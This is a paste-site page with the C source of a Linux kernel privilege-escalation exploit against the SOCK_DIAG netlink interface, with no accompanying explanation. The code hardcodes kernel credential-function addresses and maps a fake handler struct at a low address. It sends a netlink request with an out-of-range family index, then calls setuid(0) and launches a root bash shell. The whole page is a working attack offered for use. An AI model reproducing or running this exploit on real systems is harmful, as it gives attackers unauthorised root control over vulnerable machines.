Untitled

avatar
unknown
plain_text
a year ago
2.6 kB
7
Indexable
** 
 * SOCK_DIAG trigger
 */

#include <unistd.h>
#include <sys/socket.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/inet_diag.h>
#include <sys/mman.h>
#include <assert.h>
//#include <linux/sock_diag.h>
//#include <linux/unix_diag.h>
//#include <linux/netlink.h>
#include "sock_diag.h"
#include "unix_diag.h"
#include "netlink.h"

unsigned long sock_diag_handlers, nl_table;

struct req_t {
        struct nlmsghdr nlh;
        struct unix_diag_req r;
};

typedef int (*commit_creds_fn)(unsigned long cred);
typedef unsigned long (*prepare_kernel_cred_fn)(unsigned long cred);

void privesc() {
        commit_creds_fn commit_creds = (commit_creds_fn)0xffffffff8107ee30;
        prepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)0xffffffff8107f0c0;
        commit_creds(prepare_kernel_cred(0));
}

int main(int argc, char*argv[]) {
        int fd;
        struct req_t req;

        if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
                printf("Can't create sock diag socket\n");
}

        memset(&req, 0, sizeof(req));
        req.nlh.nlmsg_len = sizeof(req);
        req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
        req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
        req.nlh.nlmsg_seq = 123456;
        req.r.sdiag_family = 45; // this is our "wild" index -> will point to 0x1ad38
        req.r.udiag_states = -1;
        req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

        // Create fake diag handler
        struct sock_diag_handler {
                char family;
                void (*dump)();
        };
        struct sock_diag_handler fake_struct = {0};
        fake_struct.dump = privesc;

        // Mmaping
        unsigned int u32Address = 0x1ad38;
        void* pCode = NULL;
        assert((pCode = (void*)mmap((void*)(u32Address & 0xFFFFF000), 0x5000, 7, 0x32, 0, 0)) == (void*)(u32Address & 0xFFFFF000));
        printf("[+] Shellcode at %lx, Mmap at : %lx\n", pCode+(u32Address & 0xFFF), u32Address & 0xFFFFF000);
        memcpy(pCode+(u32Address & 0xFFF), &fake_struct, 0x100);


        //return;

        getchar();

        // Trigger fd exploitation
        if (send(fd, &req, sizeof(req), 0) < 0) {
                printf("[-] Error\n");
        }
        printf("[+] Triggered!\n");

        getchar();
        assert(!setuid(0));
        return execl("/bin/bash", "-sh", NULL);
}
Editor is loading...
Leave a Comment